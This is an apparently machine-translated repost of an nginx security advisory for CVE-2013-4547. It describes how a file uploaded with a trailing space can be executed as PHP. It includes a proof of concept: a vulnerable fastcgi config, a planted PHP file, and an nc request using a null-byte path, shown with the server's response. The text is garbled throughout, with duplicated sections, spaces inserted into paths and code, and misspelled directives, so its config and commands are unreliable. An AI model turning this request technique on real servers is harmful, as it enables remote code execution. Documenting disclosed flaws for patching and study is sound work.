Vulnerability in nginx - nginx security advisory (CVE-2013-4547)
A vulnerability has been discovered (and has been fixed) in nginx.
Details here: mailman.nginx.org/pipermail/nginx-ru/2013-November/052575.html
The nginx version 0.8.41 - 1.5.6 is subject to the problem.
The problem is fixed in nginx 1.5.7, 1.4.4.
A patch is available for custom configurations - nginx.org/download/patch.2013.space.txt
This part is especially interesting:
In the popular nginx + php configuration, the vulnerability can be exploited as follows:
* The user uploads a file with a space at the end of the server.
* By a specially crafted request, this file is executed.
For nginx + php5-fpm, the following conditions must be met for exploiting the vulnerability:
1) fastcgi_param PATH_TRANSLATED should be of the form $ document_root / $ fastcgi_script_name, i.e. the script value is taken from the request
2) in the fpm pool config, the ecurity.limit_extensions value should skip any files. By default, it is set to .php .php3 .php4 .php5
Example of operation:
Finally, the query itself:
Details here: mailman.nginx.org/pipermail/nginx-ru/2013-November/052575.html
The nginx version 0.8.41 - 1.5.6 is subject to the problem.
The problem is fixed in nginx 1.5.7, 1.4.4.
A patch is available for custom configurations - nginx.org/download/patch.2013.space.txt
This part is especially interesting:
as well as the ability to cause special processing of a file with a space at the end in the configuration of the form
location ~ \ .php $ {
fastcgi_pass ...
}
')
requesting the file as "/ file \ 0.php".
In the popular nginx + php configuration, the vulnerability can be exploited as follows:
* The user uploads a file with a space at the end of the server.
* By a specially crafted request, this file is executed.
For nginx + php5-fpm, the following conditions must be met for exploiting the vulnerability:
1) fastcgi_param PATH_TRANSLATED should be of the form $ document_root / $ fastcgi_script_name, i.e. the script value is taken from the request
2) in the fpm pool config, the ecurity.limit_extensions value should skip any files. By default, it is set to .php .php3 .php4 .php5
Example of operation:
server { listen *: 80; server_name example.com; access_log ...; error_log ...; root / var / www / hot; location ~ \ .php $ { include / etc / nginx / fastcgi_params; fastcgi_param PATH_TRANSLATED $ document_root / $ fastcgi_script_name; fastcgi_param SCRIPT_FILENAME $ document_root / $ fastcgi_script_name; fastcgi_pass pass; } location / css / {} location / js / {} location / img / {} }
cat "/ var / www / hot / hole" <? php echo "I am hole"; ?>
Finally, the query itself:
echo -e "GET / hole \ 0.php HTTP / 1.1 \ r \ nHost: example.com \ r \ n \ r \ n" | nc -w 1 example.com 80 HTTP / 1.1 200 OK Server: nginx / 1.4.1 Date: Tue, 19 Nov 2013 15:31:51 GMT Content-Type: text / html Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP / 5.4.19-1 ~ dotdeb.1 9 I am hole 0
Source: https://habr.com/ru/post/202796/
All Articles